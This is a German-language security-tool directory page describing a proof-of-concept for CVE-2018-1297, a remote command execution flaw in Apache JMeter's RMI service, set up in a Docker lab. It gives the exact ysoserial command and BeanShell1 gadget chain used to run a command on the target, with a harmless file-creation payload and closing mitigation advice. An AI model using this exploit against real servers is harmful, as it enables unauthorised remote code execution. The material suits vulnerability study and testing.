Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/48484848484848/jmeter-cve-2018-1297-
Payload-GenerierungSchwachstellenanalyseExploitationPenetrationstestsCommand and ControlRemote-Access-Tool
GitHub48484848484848/jmeter-cve-2018-1297-

Jmeter-CVE-2018-1297-

Proof-of-Concept-Exploit für die Apache JMeter RMI-Deserialisierungsschwachstelle (CVE-2018-1297), der über ysoserial-Payloads Remote-Befehlsausführung ermöglicht.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 2 JahrenNoch nicht geprüft

Jmeter RMI Deserialisierungs-Schwachstelle zur Befehlsausführung (CVE-2018-1297)



Apache JMeter ist eine Open-Source-Software-Suite, die von der American Apache Software Foundation in Java für Stresstests und Leistungstests geschrieben wurde.
Die Versionen 2.x und 3.x enthalten eine Deserialisierungs-Schwachstelle, mit der ein Angreifer beliebige Befehle auf dem Zielserver ausführen kann.

Ausführung der Schwachstellenumgebung:


root@kitploit:~
docker compose up -d

Ich habe Docker unter Kali Linux verwendet.

Nach Abschluss der Ausführung startet der RMI-Dienst und lauscht auf Port 1099.


Schwachstelle:


Führen Sie den Angriff auf die Schwachstelle direkt mit ysoserial durch.
root@kitploit:~
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit your-ip 1099 BeanShell1 'touch /tmp/success'

Geben Sie den obigen Befehl ein.
Es wurde die Exploit-Kette BeanShell1 verwendet.

root@kitploit:~
docker compose exec jmeter bash

Wenn Sie mit dem Befehl in den Container eintreten, können Sie sehen, dass '/tmp/success' erfolgreich erstellt wurde.


Zusammenfassung


Diese Schwachstelle nutzt eine RMI (Remote Method Invocation) Schwachstelle aus, die in Java-basierten Anwendungen auftreten kann.
Die hier verwendete Datei 'ysoserial-0.0.6-SNAPSHOT-all.jar' ist Teil des ysoserial-Projekts und wird verwendet, um Payloads zu generieren, die Java-Deserialisierungs-Schwachstellen ausnutzen und die Ausführung von Remote-Code ermöglichen.

Dieser Payload hat das Ziel, Befehle wie /tmp/success auszuführen, und durch diese Schwachstelle kann ein Angreifer beliebige Befehle auf dem entfernten System ausführen oder Systemdateien ändern.
Maßnahmen zur Eindämmung dieser Schwachstelle umfassen die Zugriffsbeschränkung auf den RMI-Dienst, eine strenge Zugriffskontrolle sowie die Filterung von Java-Deserialisierung.
Tool herunterladen